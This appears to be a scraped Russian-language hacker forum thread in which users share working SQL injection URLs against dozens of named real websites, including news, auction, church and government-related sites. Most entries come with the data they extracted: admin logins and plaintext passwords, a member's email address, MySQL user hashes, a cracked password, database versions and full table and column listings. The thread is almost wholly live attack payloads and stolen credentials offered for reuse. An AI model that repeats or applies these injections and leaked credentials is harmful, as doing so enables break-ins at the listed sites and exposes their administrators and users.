http://www.labtribo.ru/

http://www.labtribo.ru/live/news.asp?news_id=1+or+1=(SELECT+TOP+1+cast(login+a s+nvarchar)%2Bchar(58)%2Bcast(password+as+nvarchar )+FROM+users)--

admin:$lowh@nd$

sql-injection dozory.ru
http://day-watch.dozory.ru/services/exp/top_actors/
настройки(вверху справа)-
показывать в топах по 1' игроков
сохраняем и видим ошибку.

т.к. тему в разделе удалили, значит выкладываю здесь..Не пропадать же добру. Не зря ведь искал...

осталось только раскрутить. У меня так и не получилось.. в union дошёл до 30 полей....

Отследил работу скрипта, можно ещё таким запросом

http://day-watch.dozory.ru/services/exp/ajax_topactors.php?elem=alltop&date=?show_in_top=10%27%22

http://www.oke.ru/xo4u.php?id=-42708+UNION+select+1,2,passw,4,5,6,7,8,9,10+FROM+c hausers+LIMIT+0,1/*

Тока пароль пустой :)

sql-injection dozory.ru
через пост там не получится, надоть через куки... прогнал скриптом ради интереса до сотни... что-то там не так :(

vidsfree.net Porno


http://vidsfree.net/tvshows.php?mode=details&id=-1+union+select+1,concat_ws(0x3a,username,lastlogin ,password,email),3,4,5,6,7,8,9,10,11,12,13,14+from +admin_login/*

admin:merlot5009

http://vidsfree.net/admin

в админке ничего интересного


http://vidsfree.net/tvshows.php?mode=details&id=-1+union+select+1,concat_ws(0x3a,username,lastlogin ,password,email),3,4,5,6,7,8,9,10,11,12,13,14+from +member/*


adrianman:a103795:annessaybarra@yahoo.com

В погоне за читами! =) Я читер, епт.

http://supercheats.com

http://teams.supercheats.com/category.php?cid=5'+union+select+1,2,concat_ws(cha r(58),screenname,*)+from+forum_users/*
Не смог подобрать название колонки ПАРОЛЯ. Чудом подобрал screenname, пароль ни в какую...

Смог найти имена таблиц:
http://www.gym2.km.ua/?id=-14+union+select+TABLE_NAME+FROM%20INFORMATION_SCHE MA.TABLES+limit+0,200/*

Нашел имена столбцов в jos_users
http://www.gym2.km.ua/?id=-14+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEM A.COLUMNS+WHERE+TABLE_NAME=0x6A6F735F7573657273+li mit+0,100/*

Но вот FATALITY не получается сделать, вроде все правильно написано, но выводить инфу не хочет.
http://www.gym2.km.ua/?id=-14+union+select+concat(id,%20char(58),name,char(58 ),username,char(58),password,char(58),usertype,cha r(58),block,char(58),0x3C62723E)+FROM+jos_users+li mit+0,10/*

2 Лайт
Таблица в другой базе лови:
_http://www.gym2.km.ua/?id=-14+union+select+concat(id,char(58),name,char(58),u sername,char(58),password,char(58),usertype,char(5 8),block,char(58),0x3C62723E)+FROM+test.jos_users+ limit+0,10/*

.au


PR - 2
http://www.victimsupport.act.gov.au/content.php?id=33+order+by+1/*


PR - 4
http://www.agsafe.com.au/guardian/content.php?id=-3+union+select+1,2,aes_decrypt(aes_encrypt(version (),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14/*
agsafe@localhos:4.1.11-Debian_4sarge7:agsafe


PR - 4
http://www.ecoaction.com.au/category.php?id=-55+union+select+1,2,3,aes_decrypt(aes_encrypt(user ()/version()/database(),0x71),0x71),5,6,7,8,9,10,11/*
enviro@localhost:4.1.11-Debian_4sarge7:enviro
http://www.ecoaction.com.au/category.php?id=-55+union+select+1,2,3,aes_decrypt(aes_encrypt(id/username/password,0x71),0x71),5,6,7,8,9,10,11+from+users/*

1:admin:m3mph15


PR - 4
http://www.agrifoodskills.net.au/display_announce.php?id=-1+union+select+concat_ws(0x3a,aes_decrypt(aes_encr ypt(user(),0x71),0x71),aes_decrypt(aes_encrypt(ver sion(),0x71),0x71),aes_decrypt(aes_encrypt(databas e(),0x71),0x71))/*
agrione@localhost:4.0.20a-nt:agrirev


PR - 4
http://www.onlymelbourne.com.au/melbourne.php?id=-4+union+select+1/*


PR - 5
http://www.churchilltrust.com.au/content.php?id=-54+union+select+1,2,3,aes_decrypt(aes_encrypt(user ()/version()/database(),0x71),0x71),5,6,7,8,9,10,11/*
winston@localhost:4.1.11-Debian_4sarge7:churchilltrust


PR - 5
http://www.isc.org.au/display_page.php?id=-12+union+select+concat_ws(0x3a,aes_decrypt(aes_enc rypt(user(),0x71),0x71),aes_decrypt(aes_encrypt(ve rsion(),0x71),0x71),aes_decrypt(aes_encrypt(databa se(),0x71),0x71))/*
fred294@localhost:5.0.27-community-nt:isc


PR - 6
http://www.overclockers.com.au/article.php?id=-1+union+select+1/*
Фильруется идентификатор страницы ;)

На сегодня все. Без дефейсов пожалуйста )

И еще - тем, кто считает, что постят в данной теме только тупые "разрушители": Вся информация о найденных уязвимостях сначала отправляется администратору сайта и только потом выкладывается в данный раздел для ознакомления.

https://eed.llnl.gov/photos.php?id=7'+union+select+1,2,3,4,5,6,7,8,CONC AT(Version(),char(58),Database(),char(58),User()), 10/*

http://www.jumpbite.com/browse.php?cat=15&page=0.01

Вот:
http://www.esen.education.fr/fr/ressources-par-type/detail-d-une-ressource/?idRessource=874=662e308c5d=1

http://www.bahamasdevelopmentbank.com/feature.php?id=-1+union+select+all+1,concat(user,0x3a,password),3, null,5,6,7+from+mysql.user+limit+1,1--

вот сегодня насобирал.. :D
http://www.myauctionplanet.com/category.php?cate_id=0+union+select+1,version(),3/*
4.1.22-standard
http://www.myfundraisingauction.com/category.php?cate_id=-1283+union+select+1,version(),3,4/*
4.1.22-standard
http://www.point5.co.nz/category.php?cate_id=1+union+select+1,version(),3, 4/*
4.1.22-standard
http://www.tapinglobal.com/category.php?cate_id=-578+union+select+1,version(),3/*
5.0.45-community-log
http://www.loopp.com/00/navi/category.php?cate_id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,version(),29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62, 63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78/*
4.1.22-standard-log
http://www.dichroicimagery.com/auction/category.php?view=gallery&cate_id=-140+union+select+1,2,3,4,unhex(hex(version())),6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47,48,49,50,51,52/*
4.1.16
http://kiwibidz.com/category.php?cate_id=-965+union+select+1,version(),3,4/*
5.0.45
http://schoolhotlunch.org/category.php?cate_id=-10+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4/*&view=list
4.1.20-max-log::avanti_school@76.162.254.228::avanti_school
http://www.buyskool.com/category.php?cate_id=-730+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3,4/*&view=list
4.1.22-standard::wwwbuys_admin@localhost::wwwbuys_masterd b
http://bid4tackle.com/category.php?cate_id=-13+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4/*
5.0.45-log::micheal8311@10.3.16.1::bid4tackle
http://egyptexporters.com/category.php?cate_id=-109+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3/*
4.1.21-standard::webart_eexport@localhost::webart_export
http://market4d.com/category.php?cate_id=-140+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3,4/*
5.0.45::market@localhost::market
http://bidonlots.com/category.php?view=list&cate_id=-611+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3--
5.0.51a-community::wwwbil_peter@localhost::wwwbil_AJauctio n
http://www.zbid.co.uk/category.php?view=list&cate_id=-982+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3/*
4.1.22-standard::zbidco_auction@localhost::zbidco_auction e
http://nooglebid.com/category.php?cate_id=-156+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3,4--
5.0.51-log::thamesn_steve@web10.hostedservice.co.uk::tham esn_nooglebid
http://www.farmtofarm.net/category.php?view=list&cate_id=-1147+union+select+1,concat_ws(0x3a3a,version(),use r(),database()),3,4/*
4.1.22-standard-log::farmtofa_gerard@localhost::farmtofa_farmtofar m
http://repeatbargains.net/category.php?cate_id=-112+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3,4/*
5.0.45::repeat@localhost::repeat
http://auction434u.com/category.php?view=gallery&cate_id=-125+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3/*
5.0.22::auction_admin@localhost::auction
http://www.free-auction.cn/category.php?cate_id=-71+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3/*
5.0.41-community-log::brownte_jsf@98.130.2.3::brownte_free-auction
http://www.grosist.ro/category.php?cate_id=-81+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4/*
4.1.20::bafgrosist@localhost::pmgrosist

gisTy
http://www.africanfreemarket.com
admin:$1$0da78.Z1$Z7LSg2oGyC1a6im6EqaSz1:admin@afr icafreebay.com
http://www.ebay-clone.com
admin:admin:admin@ajsquare.com

sabe, почистил. спс что показал

Немольшая потборка

--
http://www.arcdi.com/trainers.php?id=-33+union+select+1,concat(username,0x3a,password),3 ,4,5+FROM+users%20--[/code]neeblee.com


http://www.neeblee.com/plaincart/index.php?c=39&p=-33+union+select+1,concat_ws(0x3,user_name,user_pas sword),3,4,5+from+tbl_user/*

--

/*
<v5_01> (SQL INJ) http://www.prbc.org.au/churchsite/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://www.choosedestiny.com/index2.php?option=com_prayercenter&task=view_reque st&id=-
1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://www.prbc.org.au/churchsite/index.php?option=com_prayercenter&Itemid=51/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://connectinchrist.com/component/option,com_prayercenter/Itemid,74/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://www.worlddayofprayeraustralia.org/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://connectinchrist.com/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://www.ejesus.com.br/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://www.threecordstrand.net/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://www.threecordstrand.net/index.php?option=com_prayercenter&Itemid=30/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://www.icfaustralia.org.au/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://www.ejesus.com.br/index.php?option=com_prayercenter&Itemid=78/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://www.icfaustralia.org.au/index.php?option=com_prayercenter&Itemid=41/index2.php?option=com_prayercenter&task=view_reque st&id=1+UNION+SELECT+user(),user(),concat(username,0x 3a,password),user(),user(),user(),user(),user(),us er( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://www.promvr.com.br/principal/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://www.ibbt.org.br/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://www.ibbt.org.br/index.php?option=com_prayercenter&task=view/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://www.rccsaopaulo.com.br/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://www.rccgoias.org.br/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://www.rccsaopaulo.com.br/index.php?option=com_prayercenter&task=subscribe&I temid=/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://www.rccgoias.org.br/index.php?option=com_prayercenter&task=view/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://www.iem.org.br/site/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://www.iem.org.br/site/index.php?option=com_prayercenter&Itemid=69/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://igrejabatistaagape.org.br/joomla/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://gpom.com.br/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://gpom.com.br/index.php?option=com_prayercenter&task=new&Itemid=/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://www.canaljesus.com.br/media/option,com_prayercenter/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

<v5_01> (SQL INJ) http://www.canaljesus.com.br/media/option,com_prayercenter/Itemid,45.aspx/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users--

*\

.is

Сегодня ужасный недохек :(

Но зато отличные домены ) ir.is / fg.is / 69.is / numi.is / php.internet.is


PR - 4
http://www.acsr.be/artic_gen.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

PR - 5
http://69.is/openlink.php?id=52900+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12/*

PR - 5
http://www.ornefni.is/n-greinar2.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10/*


http://php.internet.is/kraftaheimar/lesa_frettina.php?id=-2187+union+select+1,2,3,4,5,6,7,8,9,10/*



http://numi.is/fullfrettir.php?id=-9+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),v ersion(),database()),8,9/*
numiuser@server2.hysir.net:4.1.20-log:numi

PR - 4
http://www.fg.is/page.php?id=-35+union+select+1,2,concat_ws(0x3a,user(),version( ),database()),4,5,6/*
fguser@localhost:4.1.20-log:fg

PR - 5
http://www.ir.is/1.3.svid.php?id=-7+union+select+concat_ws(0x3a,user(),version(),dat abase()),2,3,4/*
srr@localhost:5.0.32-Debian_7etch5-log:nam


Кто докрутит - выкладывайте ) Там много где 4М, так что подбором токо :(

Без дефейсов пожалуйсто )

еще одна ошибка в Limit

http://hq-films.ws/browse.php?page=0.01

кстати реально ченить с этой ошибкой сделать?

еще чуть-чуть от меня...

PR 4
http://www.emajonline.com/index.php?action=1&extra=educators_list.php&cat_id=-53+union+select+1,2,3,4,5,concat_ws(0x3a3a,version (),user(),database()),7/*4.1.22-standard::emajo2_webuser@localhost::emajo2_emaj


PR 4
http://www.queerzagreb.org/new/index.php?page=article_en&cat_id=15&id=-121+union+select+1,2,3,4,unhex(hex(concat_ws(0x3a3 a,version(),user(),database()))),6,7,8,9,10,11,12/*4.1.11-Debian_4sarge7-log::qu2zg@localhost::queer2


PR 4
http://www.trenerski-forum.hr/index.php?page=category&cat_id=4+union+select+1,unhex(hex(concat_ws(0x3a3a ,version(),user(),database()))),3,4,5,6,7,8,9,10,1 1/*&lang=hr4.1.11-Debian_4sarge7-log::trenersk@localhost::trenersk

PR 2
http://www.hotel-drava.com/index.php?page=article&id=21+union+select+1,unhex(hex(concat_ws(0x3a3a,ve rsion(),user(),database()))),3,4,5,6,7,8,9,10,11,1 2/*4.1.20::hdrava@localhost::content

http://www.mrkzapresic.hr/index.php?page=article&id=5+union+select+1,unhex(hex(concat_ws(0x3a3a,ver sion(),user(),database()))),3,4,5,6,7,8,9,10,11,12 ,13,14/*4.1.11-Debian_4sarge7-log::mrkzapresic@localhost::mrkzapr

Раскрутил скулю бальтозара, не без помощи суча :)

http://pipe.com.ua/j2me/view.php?m_id=-2+union+select+1,2,concat_ws(0x3a,l_name,l_passwd) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32+from+amgrit.login+ limit+0,1/*

ray:muter342

chinacourt.org

http://en.chinacourt.org/public/detail.php?id=999+union+select+1,concat(user,char( 58),password,char(58),File_priv,char(58),host)+fro m+mysql.user

5.0.51a-log:dbuser@localhost:fy_en
root::Y:localhost
zq16167:22f421104e6fdb11:N:192.168.100.%
dbuser:0a9aadd73a743bd7:Y:localhost
dadmin:4f73678d19210e5a:N:192.168.100.23
polluser:5f33fe201e0b7703:N:localhost


CHARACTER_SETS
COLLATIONS
VIEWS
announce
announce_bills
announce_cancel_cause
announce_charge
announce_courts
announce_debtors
announce_status
auction
ad_click
ad_click_detail
area
article
article_court
article_keyword
article_location
article_log
article_subject
click_count
comment
control
court
court_level
court_reg_class
direct
images
location_img
lszx_charge
lszx_config
lszx_domain
lszx_image
lszx_organization
lszx_province
lszx_search
lszx_specialty
manager
id
enable_flag
types
account
password
location
reg_date
name
1:1:0:root:mt28xqfch:0000000000:2002-01-18 16:51:12
3:0:2:newsmanager:gsdlj:0000000000:2002-05-29 10:02:54
manager_log
obj
obj_class
obj_info
obj_pic
subject
subject_kind
video
vote_data


мля нифига не понимаю по китайски)

http://www.realty.lv/?lang=ru&id=2&category_id=1&news_id=-4868'+union+select+1,2,3,login,pass,6,7,8,9,0,1+fr om+user+where+id=1/*

До админки добратся не получилось :(

http://www.aif.md/index.php?id=-52+union+select+1,2,version(),4,5,6,7,8/*
http://www.vedomosti.md/index.php?doc=6&ID=-417+union+select+1,2,3,4,5,6,7,version()/*
http://www.studii.md/work_view_vacancy_detail.php?id=-3055+union+select+1,2,3,version(),5,6,7,8,9,10,11, 12,13,14,15,16/*
http://www.statistica.md/news.php?lang=ru&id=-173+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11/*
http://www.rabota.md/vacancies/vacancy/index.php?id=-7052+union+select+1,2,3,version(),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21/* http://www.ipoteka.md/ro/law.php?ID=-5+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,1 3,14,15,16/*
http://www.aquasystems.md/readarticle.php?id=-3+union+select+1,2,table_name+from+information_sch ema.tables/*
.мд пад апстрелам :))

http://www
Научи такие скули находить :(

Научи такие скули находить :(
ты там ниже пакрути там все есть :) чото хз чо так вышло

http://www.aquasystems.md/readarticle.php?id=-3+union+select+1,2,table_name+from+information_sch ema.tables/*

http://www.aquasystems.md/readarticle.php?id=-3+union+select+1,password,name+from+rgb_members/*

User : OzzZZ
Hass : 6055322b3c1cc50cef132211ca57aa75 Cracked : 29123098

good.



good.

http://www.aquasystems.md/readarticle.php?id=-3+union+select+1,2,table_name+from+information_sch ema.tables/*

http://www.aquasystems.md/readarticle.php?id=-3+union+select+1,password,name+from+rgb_members/*

User : OzzZZ
Hass : 6055322b3c1cc50cef132211ca57aa75 Cracked : 29123098

good.




good.

да да я знаю) я все крутил до последнего) но выложивать не стал т.к. тот кто знает тот розберецца... тут все просто .....

а вот вам добавочка.... правда прикольно? :))))

http://www.aquasystem.ro/sectiuni.php?nSId=-3+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7/*

Database Version: 5.0.32-Debian_7etch5-log
Database name: aquasystem
User name: aevum@localhost

Stolica.ru
http://stolica.ru/s/prop/prop.pl?d&name=price&node=group&node_name=1%27%20union%20select%20concat_ws(0x3a,n ame,passwd)+from+userreg/*
кароч. очень заплутаный и кривой сайт.)

Atvideo.ru
http://www.atvideo.ru/search/?words=1'
Gorev
http://www.aquasystem.ro/sectiuni.php?nSId=-3+union+select+1,concat_ws(0x3a,client_email,clien t_pwd),3,4,5,6,7+from+client/*
нашел админку: /admin
но нет соответствия в базе.)

PR 3
http://www.ekomtech.kiev.ua/a-news/news.php?id=-6+union+select+1,2,3,concat(version(),0x3a3a,user( ),0x3a3a,database()),5,6,7,8,9/*
4.1.21-standard-log::ekomtech_ekomtec@localhost::ekomtech_ekomtech


PR 2
http://www.texnostar.com.ua/a-news/news.php?id=-1694+union+select+1,2,3,concat(version(),0x3a3a,us er(),0x3a3a,database()),5,6,7,8,9,0/*
4.1.21-standard-log::texnosta_texno@localhost::texnosta_texno


PR 2
http://www.unimed.com.ua/a-news/news.php?id=-2+union+select+1,2,3,concat(version(),0x3a3a,user( ),0x3a3a,database()),5,6,7,8,9/*
4.1.22::u_unimed@localhost::unimed


PR 4
http://www.worldconnection.nl/wclayout/news.php?site_id=-25+union+select+1,2,3,4,concat(version(),0x3a3a,us er(),0x3a3a,database()),6,7,8,9/*
4.0.12-nt::worldconnection@localhost::worldconnection
есть раскрытие путей: C:\Web\worldconnection.nl\wclayout\news.php


PR 5
http://www.bispublishers.nl/bookpage.php?id=-90+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37/*
5.0.26-log::eholla_bisa@wh-www22.xs4all.nl::eholla_bis


PR 4
http://www.condoleance.nl/register.php?id=-10254+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,u nhex(hex(concat(version(),0x3a3a,user(),0x3a3a,dat abase()))),7,8,9/*&start=1
4.1.5-gamma::bartje@localhost.condoleance.nl::condoleanc e
есть вывод /etc/passwd...

www.absoluteaudio.ru - Абсолютное Аудио


http://www.absoluteaudio.ru/diler.phtml?id=-1+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x3a,user,password),0x71),0x71),4,5+from+mysql. user/*

root:agashi
javash:12345
chanel:damoda
basilio:asshole
chatstat:chatstat
oleconsulting:123456
news:eprst


http://www.absoluteaudio.ru/diler.phtml?id=-1+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x3a,nick_name,password),0x71),0x71),4,5+from+a dmins/*

admin:fk5*du

http://www.alltime.ru/select.php?addmodel=-99999+union+select+1/*
хмм станно.. бутто 1 колонка. но результатов 0.
http://www.ukrfood.com.ua/references/index.php?id=9999999
и еще непохек.

gisTy
http://www.bispublishers.nl/bookpage.php?id=-90+union+select+unhex(hex(concat_ws(0x3a,user_name ,user_password))),2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37+from+eholla_bis.user/*

...
э... спасибо=)

Pulset.ru
http://www.bestwatch.ru/watches.phtml?idb=531&idl=-9999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,co ncat_ws(0x3a,version(),database(),user())/*
Budele.net
http://www.budele.net/full.php?idas=-99999%20UNION%20SELECT%201,concat_ws(0x3a,email,pa rol),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from +objav/*

Оплата картоном.
ПР 5

http://www.goteachit.com/view_topic.php?id=269+UNION+SELECT+1,concat_ws(0x3 A3a,username,password,id,firstname,lastname,email) +FROM+users+LIMIT+1,1/*


18:announcements
18:--1:id
18:--2:title
18:--3:content
18:--4:hidden
18:--5:priority
19:coupons
19:--1:id
19:--2:code
19:--3:expires
19:--4:volume
19:--5:discount
19:--6:active
20:curricula
20:--1:id
20:--2:id_tiers
20:--3:id_users
20:--4:title
20:--5:itemnumber
20:--6:filename
20:--7:description
20:--8:keywords
20:--9:price
20:--10:submitted
20:--11:commission
20:--12:approved
20:--13:sample
21:curricula_bad
21:--1:id
21:--2:id_tiers
21:--3:id_users
21:--4:title
21:--5:itemnumber
21:--6:filename
21:--7:description
21:--8:keywords
21:--9:price
21:--10:submitted
21:--11:commission
21:--12:approved
21:--13:sample
22:hunts
22:--1:id
22:--2:subject
22:--3:instructions
22:--4:q1
22:--5:a1
22:--6:q2
22:--7:a2
22:--8:q3
22:--9:a3
22:--10:q4
22:--11:a4
22:--12:q5
22:--13:a5
22:--14:q6
22:--15:a6
22:--16:q7
22:--17:a7
22:--18:q8
22:--19:a8
22:--20:q9
22:--21:a9
22:--22:q10
22:--23:a10
22:--24:q11
22:--25:a11
22:--26:q12
22:--27:a12
22:--28:q13
22:--29:a13
22:--30:q14
22:--31:a14
22:--32:q15
22:--33:a15
22:--34:q16
22:--35:a16
22:--36:q17
22:--37:a17
22:--38:q18
22:--39:a18
22:--40:q19
22:--41:a19
22:--42:q20
22:--43:a20
22:--44:q21
22:--45:a21
22:--46:q22
22:--47:a22
22:--48:q23
22:--49:a23
22:--50:q24
22:--51:a24
22:--52:q25
22:--53:a25
22:--54:q26
22:--55:a26
22:--56:q27
22:--57:a27
22:--58:q28
22:--59:a28
22:--60:q29
22:--61:a29
22:--62:q30
22:--63:a30
22:--64:q31
22:--65:a31
22:--66:q32
22:--67:a32
22:--68:q33
22:--69:a33
22:--70:q34
22:--71:a34
22:--72:q35
22:--73:a35
22:--74:q36
22:--75:a36
22:--76:q37
22:--77:a37
22:--78:q38
22:--79:a38
22:--80:q39
22:--81:a39
22:--82:q40
22:--83:a40
22:--84:q41
22:--85:a41
22:--86:q42
22:--87:a42
22:--88:q43
22:--89:a43
22:--90:q44
22:--91:a44
22:--92:q45
22:--93:a45
22:--94:q46
22:--95:a46
22:--96:q47
22:--97:a47
22:--98:q48
22:--99:a48
22:--100:q49
22:--101:a49
22:--102:q50
22:--103:a50
22:--104:added
23:instructions
23:--1:id
23:--2:title
23:--3:content
24:jambles
24:--1:id
24:--2:subject
24:--3:iid
24:--4:clue_1
24:--5:word_1
24:--6:clue_2
24:--7:word_2
24:--8:clue_3
24:--9:word_3
24:--10:clue_4
24:--11:word_4
24:--12:mystery_clue
24:--13:mystery_word
24:--14:added
25:purchaseorders
25:--1:id
25:--2:number
25:--3:pin
25:--4:school
25:--5:phone
25:--6:total
26:sales
26:--1:id
26:--2:curricula_id
26:--3:users_id
26:--4:datetime
26:--5:price
26:--6:firstname
26:--7:lastname
26:--8:email
27:sstp_tax_name
27:--1:id
27:--2:tax_cat
27:--3:tax_name
28:sstp_tax_records
28:--1:id
28:--2:transaction_id
28:--3:trans_total
28:--4:ship_cost
28:--5:flag_tax_shipping
28:--6:intra_st_tax
28:--7:intra_co_tax
28:--8:intra_pl_tax
28:--9:fd_intra_st_tax
28:--10:fd_intra_co_tax
28:--11:fd_intra_pl_tax
28:--12:inter_st_tax
28:--13:inter_co_tax
28:--14:inter_pl_tax
28:--15:fd_inter_st_tax
28:--16:fd_inter_co_tax
28:--17:fd_inter_pl_tax
28:--18:zip5
28:--19:zip4
28:--20:trans_date
29:sstp_tax_type
29:--1:id
29:--2:transaction_id
29:--3:tax_type1
29:--4:tax_type2
29:--5:tax_type3
29:--6:tax_type4
29:--7:tax_type5
29:--8:tax_type6
30:tiers
30:--1:id
30:--2:id_levelup
30:--3:name
30:--4:visible
30:--5:priority
31:users
31:--1:id
31:--2:username
31:--3:password
31:--4:firstname
31:--5:lastname
31:--6:address
31:--7:city
31:--8:state
31:--9:zip
31:--10:phone
31:--11:email
31:--12:strengths
31:--13:background
31:--14:consignments
31:--15:writing
